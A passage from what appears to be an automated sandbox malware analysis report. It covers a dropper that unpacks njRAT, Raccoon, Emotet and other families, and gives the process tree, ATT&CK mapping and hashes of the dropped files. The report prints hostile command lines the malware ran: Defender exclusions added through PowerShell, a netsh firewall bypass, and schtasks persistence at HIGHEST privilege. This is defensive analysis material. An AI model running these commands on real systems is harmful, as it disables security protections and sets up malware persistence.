                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\unsecapp.exe'
                        7⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4656
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ServiceProfiles\NetworkService\unsecapp.exe'
                        7⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3340
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\winsessionnet\cmd.exe'
                        7⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1648
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office\cmd.exe'
                        7⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3844
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Cookies\sihost.exe'
                        7⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4768
                      • C:\Users\Public\Pictures\cmd.exe
                        "C:\Users\Public\Pictures\cmd.exe"
                        7⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3004
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c "C:\Users\Admin\AppData\Local\Temp\ultradrp\setup.eexe"
              2⤵
                PID:1520
                • C:\Users\Admin\AppData\Local\Temp\ultradrp\setup.eexe
                  C:\Users\Admin\AppData\Local\Temp\ultradrp\setup.eexe
                  3⤵
                  • Executes dropped EXE
                  PID:2332
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c "C:\Users\Admin\AppData\Local\Temp\ultradrp\njrat\njRAT-v0.6.4\njRAT.exe"
                2⤵
                • System Location Discovery: System Language Discovery
                PID:3204
                • C:\Users\Admin\AppData\Local\Temp\ultradrp\njrat\njRAT-v0.6.4\njRAT.exe
                  C:\Users\Admin\AppData\Local\Temp\ultradrp\njrat\njRAT-v0.6.4\njRAT.exe
                  3⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:1552
                  • C:\njRAT.exe
                    "C:\njRAT.exe"
                    4⤵
                    • Executes dropped EXE
                    PID:2488
                  • C:\njq8.exe
                    "C:\njq8.exe"
                    4⤵
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    PID:3640
                    • C:\Users\Admin\AppData\Local\Temp\windows.exe
                      "C:\Users\Admin\AppData\Local\Temp\windows.exe"
                      5⤵
                      • Drops startup file
                      • Executes dropped EXE
                      • Adds Run key to start application
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4764
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\windows.exe" "windows.exe" ENABLE
                        6⤵
                        • Modifies Windows Firewall
                        • Event Triggered Execution: Netsh Helper DLL
                        PID:4864
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c cd "C:\Users\Admin\AppData\Local\Temp\ultradrp\raccoon_v2" && for %f in (*) do ren %f %f.exe && start %f.exe
                2⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of SetWindowsHookEx
                PID:1616
                • C:\Users\Admin\AppData\Local\Temp\ultradrp\raccoon_v2\0123b26df3c79bac0a3fda79072e36c159cfd1824ae3fd4b7f9dea9bda9c7909.exe
                  0123b26df3c79bac0a3fda79072e36c159cfd1824ae3fd4b7f9dea9bda9c7909.exe
                  3⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:4728
                • C:\Users\Admin\AppData\Local\Temp\ultradrp\raccoon_v2\022432f770bf0e7c5260100fcde2ec7c49f68716751fd7d8b9e113bf06167e03.exe
                  022432f770bf0e7c5260100fcde2ec7c49f68716751fd7d8b9e113bf06167e03.exe
                  3⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:3132
                • C:\Users\Admin\AppData\Local\Temp\ultradrp\raccoon_v2\048c0113233ddc1250c269c74c9c9b8e9ad3e4dae3533ff0412d02b06bdf4059.exe
                  048c0113233ddc1250c269c74c9c9b8e9ad3e4dae3533ff0412d02b06bdf4059.exe
                  3⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:1788
                • C:\Users\Admin\AppData\Local\Temp\ultradrp\raccoon_v2\0c722728ca1a996bbb83455332fa27018158cef21ad35dc057191a0353960256.exe
                  0c722728ca1a996bbb83455332fa27018158cef21ad35dc057191a0353960256.exe
                  3⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:2380
                • C:\Users\Admin\AppData\Local\Temp\ultradrp\raccoon_v2\2106b6f94cebb55b1d55eb4b91fa83aef051c8866c54bb75ea4fd304711c4dfc.exe
                  2106b6f94cebb55b1d55eb4b91fa83aef051c8866c54bb75ea4fd304711c4dfc.exe
                  3⤵
                  • Executes dropped EXE
                  PID:4860
                • C:\Users\Admin\AppData\Local\Temp\ultradrp\raccoon_v2\263c18c86071d085c69f2096460c6b418ae414d3ea92c0c2e75ef7cb47bbe693.exe
                  263c18c86071d085c69f2096460c6b418ae414d3ea92c0c2e75ef7cb47bbe693.exe
                  3⤵
                  • Executes dropped EXE
                  PID:4892
                • C:\Users\Admin\AppData\Local\Temp\ultradrp\raccoon_v2\27e02b973771d43531c97eb5d3fb662f9247e85c4135fe4c030587a8dea72577.exe
                  27e02b973771d43531c97eb5d3fb662f9247e85c4135fe4c030587a8dea72577.exe
                  3⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:1356
                • C:\Users\Admin\AppData\Local\Temp\ultradrp\raccoon_v2\2911be45ad496dd1945f95c47b7f7738ad03849329fcec9c464dfaeb5081f67e.exe
                  2911be45ad496dd1945f95c47b7f7738ad03849329fcec9c464dfaeb5081f67e.exe
                  3⤵
                  • Executes dropped EXE
                  PID:3968
                • C:\Users\Admin\AppData\Local\Temp\ultradrp\raccoon_v2\47f3c8bf3329c2ef862cf12567849555b17b930c8d7c0d571f4e112dae1453b1.exe
                  47f3c8bf3329c2ef862cf12567849555b17b930c8d7c0d571f4e112dae1453b1.exe
                  3⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:1204
                • C:\Users\Admin\AppData\Local\Temp\ultradrp\raccoon_v2\516c81438ac269de2b632fb1c59f4e36c3d714e0929a969ec971430d2d63ac4e.exe
                  516c81438ac269de2b632fb1c59f4e36c3d714e0929a969ec971430d2d63ac4e.exe
                  3⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:660
                • C:\Users\Admin\AppData\Local\Temp\ultradrp\raccoon_v2\5d66919291b68ab8563deedf8d5575fd91460d1adfbd12dba292262a764a5c99.exe
                  5d66919291b68ab8563deedf8d5575fd91460d1adfbd12dba292262a764a5c99.exe
                  3⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:2116
                • C:\Users\Admin\AppData\Local\Temp\ultradrp\raccoon_v2\62049575053b432e93b176da7afcbe49387111b3a3d927b06c5b251ea82e5975.exe
                  62049575053b432e93b176da7afcbe49387111b3a3d927b06c5b251ea82e5975.exe
                  3⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:4888
                • C:\Users\Admin\AppData\Local\Temp\ultradrp\raccoon_v2\7299026b22e61b0f9765eb63e42253f7e5d6ec4657008ea60aad220bbc7e2269.exe
                  7299026b22e61b0f9765eb63e42253f7e5d6ec4657008ea60aad220bbc7e2269.exe
                  3⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:3032
                • C:\Users\Admin\AppData\Local\Temp\ultradrp\raccoon_v2\7322fbc16e20a7ef2a3188638014a053c6948d9e34ecd42cb9771bdcd0f82db0.exe
                  7322fbc16e20a7ef2a3188638014a053c6948d9e34ecd42cb9771bdcd0f82db0.exe
                  3⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:2704
                • C:\Users\Admin\AppData\Local\Temp\ultradrp\raccoon_v2\960ce3cc26c8313b0fe41197e2aff5533f5f3efb1ba2970190779bc9a07bea63.exe
                  960ce3cc26c8313b0fe41197e2aff5533f5f3efb1ba2970190779bc9a07bea63.exe
                  3⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:3584
                • C:\Users\Admin\AppData\Local\Temp\ultradrp\raccoon_v2\99f510990f240215e24ef4dd1d22d485bf8c79f8ef3e963c4787a8eb6bf0b9ac.exe
                  99f510990f240215e24ef4dd1d22d485bf8c79f8ef3e963c4787a8eb6bf0b9ac.exe
                  3⤵
                  • Executes dropped EXE
                  PID:1420
                • C:\Users\Admin\AppData\Local\Temp\ultradrp\raccoon_v2\bd8c1068561d366831e5712c2d58aecb21e2dbc2ae7c76102da6b00ea15e259e.exe
                  bd8c1068561d366831e5712c2d58aecb21e2dbc2ae7c76102da6b00ea15e259e.exe
                  3⤵
                  • Executes dropped EXE
                  PID:5368
                • C:\Users\Admin\AppData\Local\Temp\ultradrp\raccoon_v2\c6e669806594be6ab9b46434f196a61418484ba1eda3496789840bec0dff119a.exe
                  c6e669806594be6ab9b46434f196a61418484ba1eda3496789840bec0dff119a.exe
                  3⤵
                  • Executes dropped EXE
                  PID:5408
                • C:\Users\Admin\AppData\Local\Temp\ultradrp\raccoon_v2\e309a7a942d390801e8fedc129c6e3c34e44aae3d1aced1d723bc531730b08f5.exe
                  e309a7a942d390801e8fedc129c6e3c34e44aae3d1aced1d723bc531730b08f5.exe
                  3⤵
                  • Executes dropped EXE
                  PID:5420
                • C:\Users\Admin\AppData\Local\Temp\ultradrp\raccoon_v2\f7b1aaae018d5287444990606fc43a0f2deb4ac0c7b2712cc28331781d43ae27.exe
                  f7b1aaae018d5287444990606fc43a0f2deb4ac0c7b2712cc28331781d43ae27.exe
                  3⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:5476
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
              1⤵
                PID:1072
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                1⤵
                  PID:3536
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 9 /tr "'C:\Users\Public\Pictures\cmd.exe'" /f
                  1⤵
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:2088
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Users\Public\Pictures\cmd.exe'" /rl HIGHEST /f
                  1⤵
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:2612
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 14 /tr "'C:\Users\Public\Pictures\cmd.exe'" /rl HIGHEST /f
                  1⤵
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:4768
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 9 /tr "'C:\Users\Public\AccountPictures\sppsvc.exe'" /f
                  1⤵
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:4616
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Users\Public\AccountPictures\sppsvc.exe'" /rl HIGHEST /f
                  1⤵
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:2896
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 5 /tr "'C:\Users\Public\AccountPictures\sppsvc.exe'" /rl HIGHEST /f
                  1⤵
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:3144
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 5 /tr "'C:\Users\Public\Downloads\conhost.exe'" /f
                  1⤵
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:1944
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\Public\Downloads\conhost.exe'" /rl HIGHEST /f
                  1⤵
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:2380
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\Users\Public\Downloads\conhost.exe'" /rl HIGHEST /f
                  1⤵
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:1888
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Common Files\Java\dllhost.exe'" /f
                  1⤵
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:4772
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\Java\dllhost.exe'" /rl HIGHEST /f
                  1⤵
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:3792
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Common Files\Java\dllhost.exe'" /rl HIGHEST /f
                  1⤵
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:4828
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\unsecapp.exe'" /f
                  1⤵
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:3052
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\unsecapp.exe'" /rl HIGHEST /f
                  1⤵
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:1784
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\unsecapp.exe'" /rl HIGHEST /f
                  1⤵
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:1380
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 10 /tr "'C:\Windows\ServiceProfiles\NetworkService\unsecapp.exe'" /f
                  1⤵
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:1628
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Windows\ServiceProfiles\NetworkService\unsecapp.exe'" /rl HIGHEST /f
                  1⤵
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:2664
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 12 /tr "'C:\Windows\ServiceProfiles\NetworkService\unsecapp.exe'" /rl HIGHEST /f
                  1⤵
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:3964
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 11 /tr "'C:\winsessionnet\cmd.exe'" /f
                  1⤵
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:1028
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\winsessionnet\cmd.exe'" /rl HIGHEST /f
                  1⤵
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:2172
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 10 /tr "'C:\winsessionnet\cmd.exe'" /rl HIGHEST /f
                  1⤵
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:2340
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 12 /tr "'C:\Program Files\Microsoft Office\cmd.exe'" /f
                  1⤵
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:4356
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office\cmd.exe'" /rl HIGHEST /f
                  1⤵
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:4572
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 13 /tr "'C:\Program Files\Microsoft Office\cmd.exe'" /rl HIGHEST /f
                  1⤵
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:660
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 7 /tr "'C:\Users\Admin\Cookies\sihost.exe'" /f
                  1⤵
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:3872
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Users\Admin\Cookies\sihost.exe'" /rl HIGHEST /f
                  1⤵
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:3600
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 5 /tr "'C:\Users\Admin\Cookies\sihost.exe'" /rl HIGHEST /f
                  1⤵
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:1172

                Network

                MITRE ATT&CK Enterprise v15

                Reconnaissance

                Resource Development

                Initial Access

                Execution

                Command and Scripting Interpreter

                1
                T1059

                PowerShell

                1
                T1059.001

                Scheduled Task/Job

                1
                T1053

                Scheduled Task

                1
                T1053.005

                Persistence

                Boot or Logon Autostart Execution

                1
                T1547

                Registry Run Keys / Startup Folder

                1
                T1547.001

                Create or Modify System Process

                1
                T1543

                Windows Service

                1
                T1543.003

                Event Triggered Execution

                1
                T1546

                Netsh Helper DLL

                1
                T1546.007

                Pre-OS Boot

                1
                T1542

                Bootkit

                1
                T1542.003

                Scheduled Task/Job

                1
                T1053

                Scheduled Task

                1
                T1053.005

                Privilege Escalation

                Boot or Logon Autostart Execution

                1
                T1547

                Registry Run Keys / Startup Folder

                1
                T1547.001

                Create or Modify System Process

                1
                T1543

                Windows Service

                1
                T1543.003

                Event Triggered Execution

                1
                T1546

                Netsh Helper DLL

                1
                T1546.007

                Scheduled Task/Job

                1
                T1053

                Scheduled Task

                1
                T1053.005

                Defense Evasion

                Hide Artifacts

                1
                T1564

                Hidden Files and Directories

                1
                T1564.001

                Impair Defenses

                3
                T1562

                Disable or Modify System Firewall

                1
                T1562.004

                Disable or Modify Tools

                2
                T1562.001

                Modify Registry

                6
                T1112

                Pre-OS Boot

                1
                T1542

                Bootkit

                1
                T1542.003

                Credential Access

                Credentials from Password Stores

                1
                T1555

                Credentials from Web Browsers

                1
                T1555.003

                Unsecured Credentials

                1
                T1552

                Credentials In Files

                1
                T1552.001

                Discovery

                Peripheral Device Discovery

                1
                T1120

                Query Registry

                2
                T1012

                System Information Discovery

                2
                T1082

                System Location Discovery

                1
                T1614

                System Language Discovery

                1
                T1614.001

                Lateral Movement

                Collection

                Data from Local System

                1
                T1005

                Command and Control

                Web Service

                1
                T1102

                Exfiltration

                Impact

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Users\Admin\AppData\Local\Temp\7z.dll
                  Filesize

                  1.2MB

                  MD5

                  cd479d111eee1dbd85870e1c7477ad4c

                  SHA1

                  01ff945138480705d5934c766906b2c7c1a32b72

                  SHA256

                  367f8d1bfcf90ae86c0c33b0c8c9e6ec1c433c353d0663ebb44567607402c83d

                  SHA512

                  8b801bfbb933e0dc77090555fa258d416cbe9ed780fb1821aed532a979617082b29e0b6f8fb85f73a9e93c98981426c92c498a41c49f823707da3e6b7bb30128

                  Download Submit

                • C:\Users\Admin\AppData\Local\Temp\AntivirusPlatinum.zip
                  Filesize

                  699KB

                  MD5

                  ff84853a0f564152bd0b98d3fa63e695

                  SHA1

                  47d628d279de8a0d47534f93fa5b046bb7f4c991

                  SHA256

                  3aaa9e8ea7c213575fd3ac4ec004629b4ede0de06e243f6aad3cf2403e65d3f2

                  SHA512

                  9ea41fe0652832e25fe558c6d97e9f9f85ccd8a5f4d00dbcc1525a20a953fbd76efb64d69ce0fdd53c2747159d68fcb4ac0fa340e0253b5401aebc7fb3774feb

                  Download Submit

                • C:\Users\Admin\AppData\Local\Temp\AntivirusPro2017.zip
                  Filesize

                  794KB

                  MD5

                  ab1187f7c6ac5a5d9c45020c8b7492fe

                  SHA1

                  0d765ed785ac662ac13fb9428840911fb0cb3c8f

                  SHA256

                  8203f1de1fa5ab346580681f6a4c405930d66e391fc8d2da665ac515fd9c430a

                  SHA512

                  bbc6594001a2802ed654fe730211c75178b0910c2d1e657399de75a95e9ce28a87b38611e30642baeae6e110825599e182d40f8e940156607a40f4baa8aeddf2

                  Download Submit

                • C:\Users\Admin\AppData\Local\Temp\Emotet-Epoch5.zip
                  Filesize

                  289KB

                  MD5

                  ebe6bc9eab807cdd910976a341bc070d

                  SHA1

                  1052700b1945bb1754f3cadad669fc4a99f5607b

                  SHA256

                  b0353f4547466a0a402198b3750d928fc7c4e96dd3adc00b181e9d98e4602ea7

                  SHA512

                  9a6bfcb90c1e24be1b930990dd2af72e889f71ad7e1a7b8353b6522a625e2ae36013793ee2c159880bd510b8f785ce4c9dfced1d2901d3ca8f091e26084185a8

                  Download Submit

                • C:\Users\Admin\AppData\Local\Temp\RegistrySmart.zip
                  Filesize

                  1.0MB

                  MD5

                  7958e5251e5e6f9c3b7752ff1543e28a

                  SHA1

                  86f6a8439ce6a6b30e6347c5bde7e091e5fad0ac

                  SHA256

                  b31c3f9d08337314050552a7dfdceaf42bb6d22baee287cde6238a6d965d87cd

                  SHA512

                  aec50b136792aebbd5aa8e5d316c39b728ff28e411dd54db99a18d5c7b9447f25629c4220800ee8dd8cd2b24a98a11d46f32b45a62bda5135c2ff0a731e032ee

                  Download Submit

                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qkqrvc3c.qip.ps1
                  Filesize

                  60B

                  MD5

                  d17fe0a3f47be24a6453e9ef58c94641

                  SHA1

                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                  SHA256

                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                  SHA512

                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                  Download Submit

                • C:\Users\Admin\AppData\Local\Temp\dc.zip
                  Filesize

                  1.0MB

                  MD5

                  98ec05a414d61fbda2bebf65ee8a28ab

                  SHA1

                  472b24c2bc4600ab0b83b0344ef2e543e6635a79

                  SHA256

                  d62f7aa61599d5366964c419c7c2afd364e61753d1d7ba6888ae51bb65555cbd

                  SHA512

                  0773dd9151d15f989912403df1b8754884b8a802500fca307d7675f5ad78774477cf671785d0603adafa408f91258fb1d7be4b6761a117f02714e305374f9f14

                  Download Submit

                • C:\Users\Admin\AppData\Local\Temp\eternity.zip
                  Filesize

                  1.2MB

                  MD5

                  a68f97544c9b41270008b8bf68992a75

                  SHA1

                  a1ccc56eca977792cf7a751dff4ebf1f8afe8591

                  SHA256

                  eae2bbca8b001849a03bad0b21d9e876c1931685ce37876e08a9dc77e022bfad

                  SHA512

                  9bb6e21c98dada07b3c0d0c7f6addaf9d043441282fc5df4c5f348fffac047e5e662ef92a9f9df617cab79e1abbbb8648a4a3a32c1f2044aebf278fcdbdf68b3

                  Download Submit

                • C:\Users\Admin\AppData\Local\Temp\is-S3AM1.tmp\is-DATM2.tmp
                  Filesize

                  661KB

                  MD5

                  19672882daf21174647509b74a406a8c

                  SHA1

                  e3313b8741bd9bbe212fe53fcc55b342af5ae849

                  SHA256

                  34e6fea583cf1f995cf24e841da2060e0777405ac228094722f17f2e337ccea8

                  SHA512

                  eceddd4f1bbaf84dde72642f022b86033ba5a8b5105c573adcc49946d172e26e2512edce6f99e78dd3a2b0f8a23fa6138cca995a824e5f53a6ba925de434fa8f

                  Download Submit

                • C:\Users\Admin\AppData\Local\Temp\laplas.zip
                  Filesize

                  643KB

                  MD5

                  5c2ed2918e16a5391a075cac5ea253f8

                  SHA1

                  65b69a1fbc7c7192ba16d3d82bbc5311b34ee6c6

                  SHA256

                  ff505670ae62fd1bfca0bf10d8cfb7874e3f5d5c823f5c8acf9e796cda5a1943

                  SHA512

                  f1a75b9246810613b1862c357d313ef1a681e60992a24d597380b5bcdb7e302918c3e74a7739428573e015cccf1672b789277169fee8f0db91c2f207f66189ec

                  Download Submit

                • C:\Users\Admin\AppData\Local\Temp\njrat.zip
                  Filesize

                  1.5MB

                  MD5

                  3ccce9d87ce9ea751abea094d1639d0a

                  SHA1

                  427867b229e02869ac68de3a605998a585ad6a80

                  SHA256

                  5ff121c57e4a2f2f75e4985660c9666a44b39ef2549b29b3a4d6a1e06e6e3f65

                  SHA512

                  c2b77936b7238582a92d21ff9149e7eeeef65004fc5528148ecbaf9467252dff138ce545fe90bd8c621e82c38b9e0e44f022550e0cc5e5b134e504919142fe8d

                  Download Submit

                • C:\Users\Admin\AppData\Local\Temp\raccoonv2.zip
                  Filesize

                  589KB

                  MD5

                  0831d0df9d7696f6aed73600539cdb3f

                  SHA1

                  a36cc1fde961edc0de12a70235517fcb9d8fe930

                  SHA256

                  2b574142c27e20f6fd8a1285772104c9e13774631d3173f2eb825dae4a6ffe65

                  SHA512

                  8618a315967c12116503a711030c6c3c1d6207b6ce121865944202556a1ea3ed7eca31fdf0b6f91193c38e352ad165b9a767514535c59a18cf056cf0472cd995

                  Download Submit

                • C:\Users\Admin\AppData\Local\Temp\socelars.zip
                  Filesize

                  5.2MB

                  MD5

                  ccaf8b6a14e94e5163c55b0b84a6a97c

                  SHA1

                  47c67a525e642808a1ce9a6ce632bc1e1fd3dfae

                  SHA256

                  966b5aa687ca823f72ed6054802e3347908fe1ace10336e682d96d5d66db68ae

                  SHA512

                  e82c8dd091dec5cb4e522296784c8e586a186af10598b6ad9f9feaa996c0898bb6988f602e8a32741a24bcb9f4c11e07d806e3323a46aeaafaee93b7cc1756c7

                  Download Submit

                • C:\Users\Admin\AppData\Local\Temp\ud.7z.exe
                  Filesize

                  335KB

                  MD5

                  76a0b06f3cc4a124682d24e129f5029b

                  SHA1

                  404e21ebbaa29cae6a259c0f7cb80b8d03c9e4c0

                  SHA256

                  3092f736f9f4fc0ecc00a4d27774f9e09b6f1d6eee8acc1b45667fe1808646a6

                  SHA512

                  536fdb61cbcd66323051becf02772f6f47b41a4959a73fa27bf88fe85d17f44694e1f2d51c432382132549d54bd70da6ffe33ad3d041b66771302cc26673aec7

                  Download Submit

                • C:\Users\Admin\AppData\Local\Temp\ud.curl.exe
                  Filesize

                  565KB

                  MD5

                  54075ad554d012f139b7d2ea7ccb7e72

                  SHA1

                  54a7ffaf3658addbec2c945a9aeec14d8f5c3e79

                  SHA256

                  c82c78bb017655f5d67e1780b4471f6aee04fd7f5ce85f500f9bdee7f21221ba

                  SHA512

                  cf82d19fef31bda96427096124a2843123649a69ce25a64e12d2b14a1c901b953bdf3e0d2101944f09976e3b248fbfb1dd07df4999d68c83acaab440b2159798

                  Download Submit

                • C:\Users\Admin\AppData\Local\Temp\ultradrp\[email protected]
                  Filesize

                  739KB

                  MD5

                  382430dd7eae8945921b7feab37ed36b

                  SHA1

                  c95ddaebe2ae8fbcb361f3bf080d95a7bb5bf128

                  SHA256

                  70e5e902d0ac7534838b743c899f484fe10766aefacc6df697219387a8e3d06b

                  SHA512

                  26abc02bde77f0b94613edc32e0843ac71a0a8f3d8ba01cb94a42c047d0be7befef52a81984e9a0fa867400082a8905e7a63aaaf85fa32a03d27f7bc6a548c3b

                  Download Submit

                • C:\Users\Admin\AppData\Local\Temp\ultradrp\[email protected]
                  Filesize

                  816KB

                  MD5

                  7dfbfba1e4e64a946cb096bfc937fbad

                  SHA1

                  9180d2ce387314cd4a794d148ea6b14084c61e1b

                  SHA256

                  312f082ea8f64609d30ff62b11f564107bf7a4ec9e95944dfd3da57c6cdb4e94

                  SHA512

                  f47b05b9c294688811dd72d17f815cce6c90f96d78f6835804d5182e2f4bfbd2d6738de854b8a79dea6345f9372ba76a36920e51e6cb556ef4b38b620e887eb4

                  Download Submit

                • C:\Users\Admin\AppData\Local\Temp\ultradrp\[email protected]
                  Filesize

                  1.0MB

                  MD5

                  0002dddba512e20c3f82aaab8bad8b4d

                  SHA1

                  493286b108822ba636cc0e53b8259e4f06ecf900

                  SHA256

                  2d68fe191ba9e97f57f07f7bd116e53800b983d267da99bf0a6e6624dd7e5cf7

                  SHA512

